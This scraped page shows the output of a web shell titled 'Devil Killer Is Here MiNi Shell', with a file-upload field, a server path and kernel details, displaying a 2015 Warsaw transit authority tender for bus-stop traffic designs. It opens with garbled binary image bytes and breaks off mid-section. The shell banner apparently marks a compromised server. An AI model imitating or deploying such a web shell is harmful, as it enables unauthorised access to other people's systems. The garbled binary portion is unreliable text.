JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150902/129943-N-2015.html

<p class="kh_header"><b>Warszawa: Opracowanie projektów stałej organizacji ruchu dla uruchomienia  przystanków autobusowych w Warszawie</b><br>
<b>Numer ogłoszenia: 129943 - 2015; data zamieszczenia: 02.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Transportu Miejskiego , ul. Żelazna 61, 00-848 Warszawa, woj. mazowieckie, tel. 22 8268211 w. 224, faks 22 8267006, 8272552.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ztm.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektów stałej organizacji ruchu dla uruchomienia  przystanków autobusowych w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ A
I.Przedmiotem Zamówienia jest opracowanie projektów stałej organizacji ruchu dla uruchomienia przystanków autobusowych dla następujących lokalizacji: 
1.w ul. Jana Kazimierza, Dzielnica Wola - wyznaczenie 5 par  przystanków (w tym 9 przystanków  bez zatok + 1 w zatoce do odtworzenia), związane jest z uruchomieniem nowej linii  autobusowej mającej kursować w obu kierunkach ulicami: Kasprzaka - Ordona - Jana Kazimierza - Studzienną (docelowo Hubalczyków) Wolską/Połczyńską. Uruchomienie przystanków autobusowych umożliwi mieszkańcom ciągle rozrastającego się osiedla mieszkaniowego  połączenia z innymi środkami komunikacji miejskiej z innymi liniami autobusowymi i tramwajowymi na ul. Wolskiej/Połczyńskiej; ulica na całej długości jest dwukierunkowa o szer. 10 m, miejscowo na końcowym odcinku 12 m, nawierzchnia bitumiczna;
- długość prostej krawędzi przystanków po 20 m; 
- proponowane wskazania lokalizacyjne dla poszczególnych przystanków wzdłuż ulicy Jana 
  Kazimierza w kierunku południowo-zachodnim  pokazane w załącznikach A 1:   
  1.1. w rejonie skrzyżowania z ul. Ordona,
  1.2  w rejonie skrzyżowania z ul. Gizów,
  1.3. w rejonie skrzyżowania z ul. Goleszowską,
  1.4. w rejonie skrzyżowania z ul. J. Sowińskiego, lokalizacja jednego z przystanków w 
                istniejącej zatoce do odtworzenia, która obecnie funkcjonuje jako parking dla 
                samochodów osobowych,
 1.5. w rejonie skrzyżowania z ul. Hubalczyków; 
  2.    w ul. Podleśnej, Dzielnica Bielany - wyznaczenie 1 przystanku w zatoce, za skrzyżowaniem 
         z  ul. Klaudyny w kierunku ul. Marymonckiej,  związane   jest  ze  zmianą  organizacji  dla  
         linii autobusowej - przeniesienie istniejącego przystanku sprzed skrzyżowania z ul. Klaudyny 
         za to skrzyżowanie;  jezdnia  jest dwukierunkowa o szer. 7 m o nawierzchni bitumicznej; w 
         projekcie należy uwzględnić likwidację oznakowania pionowego i poziomego dla obecnie 
         funkcjonującego przystanku;
   - długość prostej krawędzi przystanku 20 m; 
   - proponowane wskazania lokalizacji przystanku wzdłuż ulicy Podleśnej w 
     kierunku południowo - zachodnim pokazane w załączniku  A 2;
   3.     w ul. Conrada,  Dzielnica  Bielany,  wyznaczenie  2  przystanków   bez   zatok  w rejonie 
           kościoła na odcinku między pętlą Chomiczówka  i skrzyżowaniem z al. Reymonta związane  
           z  jest  poprawieniem  komfortu pasażerów i  umożliwieniem  korzystania  z   komunikacji  
           miejskiej użytkownikom pobliskiego  osiedla mieszkaniowego, firm, kościoła,   istniejące 
           przystanki znajdują się w zbyt dużej odległości od siebie; jezdnia jest dwukierunkowa w 
           nawierzchni bitumicznej o  szerokości 13 m rozdzielona pasem bezpieczeństwa;
    - długość prostej krawędzi przystanków po 40 m; 
    - proponowane wskazania lokalizacyjne przystanków wzdłuż ulicy Conrada w 
     kierunku północno - zachodnim i południowo - wschodnim pokazane w załączniku  A 3;
    4.   w  ul. Modlińskiej,  Dzielnica Praga - Północ,   wyznaczenie  2   przystanków  w   zatokach 
          lub bez zatok (do rozstrzygnięcia przez projektanta), związane jest z utworzeniem 
         dodatkowych przystanków dla linii  autobusowych  kursujących ul. Modlińską 
          i skomunikowanie z węzłem przesiadkowym na pętli autobusowej oraz tramwajowej; ulica na  
          całej  długości  jest  dwukierunkowa,   trzypasmowa o nawierzchni bitumicznej; zachodzi 
          konieczność uzgodnienia z GDDK i A planu zagospodarowania terenu i propozycji 
          lokalizacyjnych przystanków (teren objęty gwarancją);
   - proponowane wskazania lokalizacyjne przystanków wzdłuż ulicy Modlińskiej pokazane 
     w załączniku A 4:
  1.1  dla przystanku w kierunku północno-zachodnim (na Białołękę) za wiaduktem Trasy 
         Toruńskiej w rejonie Kościoła; w projekcie należy uwzględnić likwidację obecnie 
         funkcjonującego przystanku czasowego pod wiaduktem;
         - długość prostej krawędzi przystanku  20 m; 
  1.2. dla przystanku w kierunku południowo-wschodnim w kierunku ul. Jagiellońskiej, za 
         skrzyżowaniem z ul. Elektronową;
         - długość prostej krawędzi przystanku 40 m;      
    5.   w ul. Smoczej, Dzielnica Wola - wyznaczenie 2 przystanków bez zatok w rejonie 
          skrzyżowania z ul. Anielewicza związane   jest z przeniesieniem przystanku Smocza 01 
          sprzed za skrzyżowanie z ul. Anielewicza oraz utworzeniem dodatkowego przystanku na 
          wysokości szkoły zmniejszającego odległości między istniejącymi sąsiednimi  przystankami 
          w tym kierunku,  jezdnia  jest dwukierunkowa o szerokości 9,20 m, nawierzchnia bitumiczna;
          - długość prostej krawędzi dla obu przystanków po 20 m; 
   - proponowane wskazania lokalizacji przystanków wzdłuż ulicy Smoczej w kierunku 
   południowo-wschodnim pokazane w załącznikach  A 5:
   1.1  dla przystanku  w kierunku za skrzyżowaniem z ul. Anielewicza, na wysokości nr 11 
          (lokalizacja wynikająca z przeniesienia przystanku Smocza 01), rejon skrzyżowania z    
          ul. Milą; w projekcie należy uwzględnić likwidację przystanku Smocza 01,
   1.2. dla  przystanku w kierunku  przed skrzyżowaniem z ul. Anielewicza, na wysokości nr 19.  
II.	Wykonawca wykona Przedmiot Zamówienia w sposób zgodny z obowiązującymi przepisami, w tym w szczególności zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 23 września 2003 r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz. U. z 2003 r. Nr 177, poz. 1729).
W projekcie stałej organizacji ruchu należy uwzględnić następujące uwarunkowania:
1) długość krawędzi przystankowej w linii prostej (pas przejazdowo-postojowy/zatoka) 
2) szerokość jezdni w zatoce 3 m,
3) pochylenie poprzeczne jezdni w zatoce 2 % w kierunku krawędzi jezdni,
4) szerokość peronów przystankowych - min. 2,00 m (nawiązując do istniejących chodników lub zaprojektować  ciągi piesze zapewniające dojścia do peronów), 
na peronach w odległości  nim.1,5  m od krawędzi jezdni należy zapewnić  wolną przestrzeń na której nie mogą znajdować się żadne elementy niezwiązane z  funkcją przystanku  (słupy, latarnie, skrzynki elektryczne, parkometry, drzewa),   
5) Wzdłuż krawędzi peronu przystankowego należy zastosować:
       a. krawężnik systemowy peronowy (typu Kassel Kerb) o wysokości 16 cm, z nawierzchnią 
           antypoślizgową,
       b. płytę wskaźnikową z wypustkami (wzór kwadrat) koloru żółtego,    
6) Zamawiający nie przewiduje na projektowanych przystankach usytuowania wiat 
       przystankowych,
7) należy dążyć do sytuowania przystanków na gruntach stanowiących własność m. st. Warszawy   
       i Skarbu Państwa,
8) należy dążyć do takiego usytuowania przystanków, aby zminimalizować ryzyko powstania 
       kolizji z sieciami uzbrojenia terenu.
Wskazane na załącznikach lokalizacje przystanków mają charakter orientacyjny. Zamawiający dopuszcza również lokalizacje przystanków w sąsiedztwie pod warunkiem optymalnego powiązania projektowanych przystanków z istniejącym układem komunikacyjnym.
Wymagane opinie i zatwierdzenia projektów organizacji ruchu:
1) Działu Organizacji Przewozów Zarządu Transportu Miejskiego,
2) Wydziału Ruchu Drogowego Komendy Stołecznej Policji,
3) Zarządu Dróg Miejskich,
4) Biura Drogownictwa i Komunikacji Urzędu m. st. Warszawy (w przypadku zmiany geometrii jezdni),
5) Zarządu Oczyszczania Miasta (w przypadku kolizji z drzewami, krzewami),
6) zatwierdzenie Inżyniera Ruchu m. st. Warszawy.
III.Projekty stałej organizacji ruchu należy opracować na postawie aktualnych map ZUD do celów projektowych pozyskanych z Biura Geodezji i Katastru Urzędu m. st. Warszawy w 4 egz. w formie papierowej oraz 1egz. w wersji elektronicznej.

CZĘŚĆ B
I.Przedmiotem Zamówienia jest opracowanie projektów stałej organizacji ruchu dla nowych przystanków autobusowych dla następujących lokalizacji: 
1.rejon skrzyżowania ul. Łabiszyńskiej i ul. Łojewskiej, Dzielnica Targówek  - wyznaczenie 3     przystanków związanych jest z   podniesieniem komfortu dla pasażerów  i poprawą dostępności do komunikacji miejskiej w tym rejonie, polegające na bardziej racjonalnym połączeniu linii autobusowych funkcjonujących w tym obrębie; proponowane wskazania lokalizacyjne przystanków w załącznikach B 1,
       1.1.  w ul. Łabiszyńskiej - wyznaczenie 1 przystanku autobusowego w zatoce na szerokim 
               pasie zieleni, za skrzyżowaniem z ul. Łojewską w  kierunku do ul. Kondratowicza po 
               zachodniej stronie ulicy,  jezdnia  jest dwukierunkowa o szer. 10 m, nawierzchnia  
               bitumiczna, w pasie zieleni występuje szpaler drzew; w projekcie należy uwzględnić 
               likwidację funkcjonującego przystanku w ul. Łojewskiej w rejonie skrzyżowania;   
               - długość prostej krawędzi przystanku 40 m,
               - wskazania lokalizacyjne przystanku na wysokości nr 23, pokazane w załączniku B 1.1.
       1.2.  w ul. Łojewskiej - wyznaczenie 1 przystanku bez zatoki, za skrzyżowaniem z ul. 
              Turmoncką, po północnej stronie ulicy, jezdnia jest dwukierunkowa  o szerokości 10 m, 
               nawierzchnia bitumiczna, usytuowanie przystanku na starym przystanku nienormatywnym 
               do odtworzenia, obecnie funkcjonującym jako parking dla samochodów osobowych,
               - długość prostej krawędzi przystanku 40 m, 
               - wskazania lokalizacyjne przystanku na wysokości nr 23, pokazane w załączniku B 1.2.
        1.3.  w ul. Łojewskiej - na istniejącym przystanku za skrzyżowaniem z ul. Turmoncką od 
                Łabiszyńskiej, na południowej stronie ulicy obecnie funkcjonującym, wyznaczyć 
                przystanek poprzez wydłużenie prostej krawędzi przystanku o 10 m do długości 40 m;
                - wskazania lokalizacyjne przystanku na wysokości nr 23, pokazane w załączniku B 1.3.
 2. w ul. Roentgena  - wyznaczenie 2 przystanków w zatokach lub bez zatok (do rozstrzygnięcia przez projektanta) ma na celu poprawienie  dostępności  komunikacji miejskiej dla  pasażerów pobliskiego osiedla mieszkaniowego jedno-  i wielorodzinnego, a także  dla pacjentów szpitala onkologicznego, jezdnia jest dwukierunkowa o szerokości 13,5 m z pasem rozdzielającym 2 m,  nawierzchnia asfaltowa, proponowane wskazania lokalizacyjne przystanków w załączniku B 2,
    1.2.  przystanek w kierunku ul. Makolągwy, w rejonie nr 16, w kierunku południowo-
               zachodnim, długość prostej krawędzi zatoki 40 m,
    2.2.  przystanek  w kierunku ul. Pileckiego, w kierunku północno-wschodnim, długość prostej  
               krawędzi zatoki 20 m,    
 3.   w ul. Piłsudskiego (Wesoła) - wyznaczenie 2 przystanków w zatokach o długości po 20 m w rejonie skrzyżowania z ul. Mazowiecką, jezdnia jest dwukierunkowa o szerokości 6,5 m, nawierzchnia bitumiczna, jezdnia z poboczem nieutwardzonym o szerokości od 2-2,5 m, bez chodników, występuje duże natężenie pojazdów, proponowane wskazania lokalizacyjne przystanków w załączniku B 3,
       3.1. przystanek w kierunku północnym za skrzyżowaniem z ul. Mazowiecką, na wysokości nr    
              4A - 4D, w sąsiedztwie proponowanej lokalizacji występują drzewa,
       3.2. przystanek w kierunku południowym za skrzyżowaniem z ul. Mazowiecką w kierunku 
              Traktu Brzeskiego, ulica graniczy z terenem zalesionym,
 4.   w ul. Saskiej - we  wskazanych lokalizacjach wydłużenie istniejących  2 przystanków do 40 m prostej krawędzi peronu, zwiększenie parametrów dla obu przystanków ma na celu poprawienie jakości i bezpieczeństwa taboru autobusowego dużej ilości kursujących linii obsługiwanej przez przystanki, jezdnia jest dwukierunkowa o szerokości 11,5 m, nawierzchnia bitumiczna, lokalizacja przystanków pokazana w załączniku B4,
       4.1.  przystanek w kierunku południowym do trasy Łazienkowskiej, istniejącą nienormatywną  
               zatokę należy przebudować do długości 40 m prostej krawędzi wraz z dopłytowaniem 
               peronu do 40 m,
       4.2.  przystanek w kierunku północnym do al. Waszyngtona bez zatoki należy wydłużyć do 40 
               m w istniejącej lokalizacji nie przekraczając linii czoła autobusu i wjazdu publicznego;   
 5.   w ul. Kondratowicza - wyznaczenie 4 przystanków bez zatok związane jest z powstaniem 
        nowej zabudowy wielorodzinnej i zapewnienie zwiększenia dostępności do komunikacji     
        miejskiej dla pasażerów  osiedli mieszkaniowych wielorodzinnych i jednorodzinnych, jezdnia jest dwukierunkowa o szerokości 7 m, nawierzchnia bitumiczna, wyznaczenie 2 par przystanków, proponowane wskazania lokalizacyjne wzdłuż ul. Kondratowicza pokazane w załączniku B 5, 
        - długość prostych krawędzi przystanków po 20 m,
      5.1. para przystanków w rejonie skrzyżowania ul. Blokowej i ul. Przy Grodzisku, 
              5.1.1.  przystanek w kierunku zachodnim do  ul. św. Wincentego, 
              5.1.2.  przystanek w kierunku wschodnim do Radzymińskiej,
       5.2. para przystanków w rejonie skrzyżowania ul. Bohuszewiczówny, które mają przejąć 
              funkcję istniejących przystanków w rejonie skrzyżowania z ul. Kleopatry przeznaczonych 
              do likwidacji w chwili uruchomienia przystanków w nowych lokalizacjach, oznakowanie 
              pionowe i poziome dla obecnie funkcjonującego przystanku należy uwzględnić w 
              projekcie,
              5.2.1.   przystanek w kierunku zachodnim do ul. św. Wincentego,
              5.2.2.   przystanek w kierunku wschodnim do ul. Radzymińskiej.
  6.   w ul. Mickiewicza, Dzielnica Żoliborz - wyznaczenie 1 przystanku bez zatoki, za przejściem 
        dla pieszych  w kierunku północnym za skrzyżowaniem z ul. Bohomolca,  związane   jest  z 
        przeniesieniem i likwidacją istniejącego przystanku Bohomolca 02,  jezdnia  jest 
        dwukierunkowa  o nawierzchni bitumicznej; w projekcie należy uwzględnić likwidację 
        oznakowania pionowego i poziomego dla obecnie funkcjonującego przystanku,
   - długość prostej krawędzi przystanku 20 m,
   - proponowane wskazania lokalizacji przystanku wzdłuż ulicy Mickiewicza w  pokazane w 
     załączniku  B 6,
II.	Wykonawca wykona Przedmiot Zamówienia w sposób zgodny z obowiązującymi przepisami, w tym w szczególności zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 23 września 2003 r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz. U. z 2003 r. Nr 177, poz. 1729).
W projekcie stałej organizacji ruchu należy uwzględnić następujące uwarunkowania:
1)długość krawędzi przystankowej w linii prostej ( pas przejazdowo-postojowy/zatoka) 
2)szerokość jezdni w zatoce 3 m,
3)pochylenie poprzeczne jezdni w zatoce 2 % w kierunku krawędzi jezdni,
4)szerokość peronu przystankowego - min. 2,00 m (nawiązując do istniejących chodników lub zaprojektować  ciągi piesze zapewniające dojścia do peronów), 
na peronach w odległości  nim.1,5  m od krawędzi jezdni należy zapewnić  wolną przestrzeń, na której nie mogą znajdować się żadne elementy niezwiązane z  funkcją przystanku  (słupy, latarnie, skrzynki elektryczne, parkometry, drzewa),
 5) Wzdłuż krawędzi peronu przystankowego należy zastosować:
        a. krawężnik systemowy peronowy (typu Kassel Kerb) o wysokości 16 cm, z nawierzchnią 
antypoślizgową,
        b. płytę wskaźnikową z wypustkami (wzór kwadrat) koloru żółtego,    
  6) Zamawiający nie przewiduje na projektowanych przystankach usytuowania wiat  
         przystankowych,
  7) należy dążyć do sytuowania przystanków na gruntach stanowiących własność m. st. Warszawy 
        i Skarbu Państwa,
  8) należy dążyć do takiego usytuowania przystanków, aby zminimalizować ryzyko powstania   
        kolizji z sieciami uzbrojenia terenu.
Wskazane na załącznikach lokalizacje przystanków mają charakter orientacyjny. Zamawiający dopuszcza również lokalizacje przystanków w sąsiedztwie pod warunkiem optymalnego powiązania projektowanych przystanków z istniejącym układem komunikacyjnym.
Wymagane opinie i zatwierdzenia projektów organizacji ruchu:
1) Działu Organizacji Przewozów Zarządu Transportu Miejskiego,
2) Wydziału Ruchu Drogowego Komendy Stołecznej Policji,
3) Zarządu Dróg Miejskich,
4) Biura Drogownictwa i Komunikacji Urzędu m.st. Warszawy(w przypadku zmiany geometrii 
       jezdni),
5) Zarządu Oczyszczania Miasta (w przypadku kolizji z drzewami, krzewami),
6) zatwierdzenie Inżyniera Ruchu m. st. Warszawy.
III.  Projekty stałej organizacji ruchu należy opracować na postawie aktualnych map ZUD do celów 
        projektowych pozyskanych z Biura Geodezji i Katastru Urzędu m. st. Warszawy w 4 egz. w 
        formie papierowej oraz 1egz. w wersji elektronicznej..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 ustawy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, jeżeli wykonał lub wykonuje w okresie ostatnich 3 lat przed upływem terminu składania ofert przynajmniej 5 (usług) usług odpowiadających swoim rodzajem przedmiotowi zamówienia tj.: opracowanie projektu stałej organizacji ruchu dla dróg kategorii co najmniej powiatowej oraz załączy dokumenty potwierdzające, że usługi te zostały wykonane bądź są wykonywane należycie - oddzielnie dla część A i części B oraz złoży prawidłowo dokumenty wymienione w rozdziale VIII SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
